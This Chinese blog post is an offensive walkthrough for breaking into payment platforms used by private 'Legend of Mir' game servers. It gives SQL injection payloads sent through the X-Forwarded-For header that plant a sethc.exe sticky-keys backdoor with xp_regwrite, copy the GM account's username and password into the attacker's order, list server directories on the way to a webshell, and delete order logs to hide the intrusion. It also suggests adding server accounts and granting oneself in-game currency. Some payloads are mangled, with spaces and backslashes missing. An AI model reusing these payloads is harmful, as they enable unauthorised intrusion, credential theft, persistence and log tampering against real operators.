入侵传奇私服支付平台的方法

2021-12-15 03:49:25  阅读 29 次 评论 10 条

入侵传奇私服支付平台的方法

今天给大家带来的是入侵传奇私服支付平台。

搜索关键字

由于时间关系我先找了一个站。

?gid=cq

算了这个站没开3389也难得搞下去。站我已经找好了。。

就这个?gid==514

下单抓包改包我们先测试下是不是sa权限。免得浪费时间。

?gid=cq

检测权限

X--,1,1,1,1,cast());--

[][ODBCSQLServerDriver][SQLServer]将nvarchar值sa转换为数据类型为int的列时发生语法错误。呵呵不错。开了3389我们替换他的shift

X-Forwarded-For:11,1,1,1,1,1);execmaster..xp_regwriteHKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsNTCurrentVersionImageFileExecutionOptionssethc.exe,debugger,REG_sz,c:windowssystem32cmd.exeon--

返回无错。。执行成功。接下来想干啥就干啥加账户进服务器。。或者查找平台上的gm账户密码给自己游戏里发元宝。。。。。

我下面也准备好了如果不是sa的情况下怎么继续入侵拿webshell.

爆出平台指定id的账户密码(显示在指定订单的充值卡号上)

X-Forwarded-For:11,1,1,1,1,1);updatemobile1setusercode=(selectusername+|+passwdfrommemberwhereid=543)wherenum=****22546319--

//num为自己下单的订单号,此处id为游戏平台gm账户id,

第一步:建立表

X-Forwarded-For:11,1,1,1,1,1);droptablefoofoofoo;createtablefoofoofoo([id][int]identity(1,1)notnull,[name][nvarchar](300)notnull,[depth][int]notnull,[isfile][nvarchar](50)null);--

第二步

X-Forwarded-For:11,1,1,1,1,1);declare@znvarchar(4000)set@z=0x65003A005C00insertfoofoofooexecutemaster..xp_dirtree@z,1,1--

//注意:0x63003a005c00=C:为sqlENCODE

d:0x64003A005C00

第三步暴出总数

X-Forwarded-For:11,1,1,1,1,1);updatemobile1setusercode=(selectcast(count(*)asvarchar(8000))+char(94)fromfoofoofoo)wherenum=****22546319--

第四步:暴出你想要的文件夹名字和文件名字

X-Forwarded-For:11,1,1,1,1,1);updatemobile1setusercode=(selecttop1cast([isfile]asnvarchar(4000))+char(94)+cast([name]asnvarchar(4000))from(selectdistincttop1*fromfoofoofooorderbyisfile,name)torderbyisfiledesc,namedesc)wherenum=****22546319--

修改distinct后面的数字,依次爆出。

一直爆找到站点目录然后备份木马到站点目录就可以拿到webshell时间关系我就不演示了。

谢谢观赏。。

byko高祖

附带删除下单日志

X-Forwarded-For:11,1,1,1,1,1);deletefrommobile1wherenumber=自己下单时候的账户--

本文地址:http://sbxxw.com/post/13239.html
版权声明:本文为原创文章,版权归 admin 所有,欢迎分享本文,转载请保留出处!

发表评论


表情

评论列表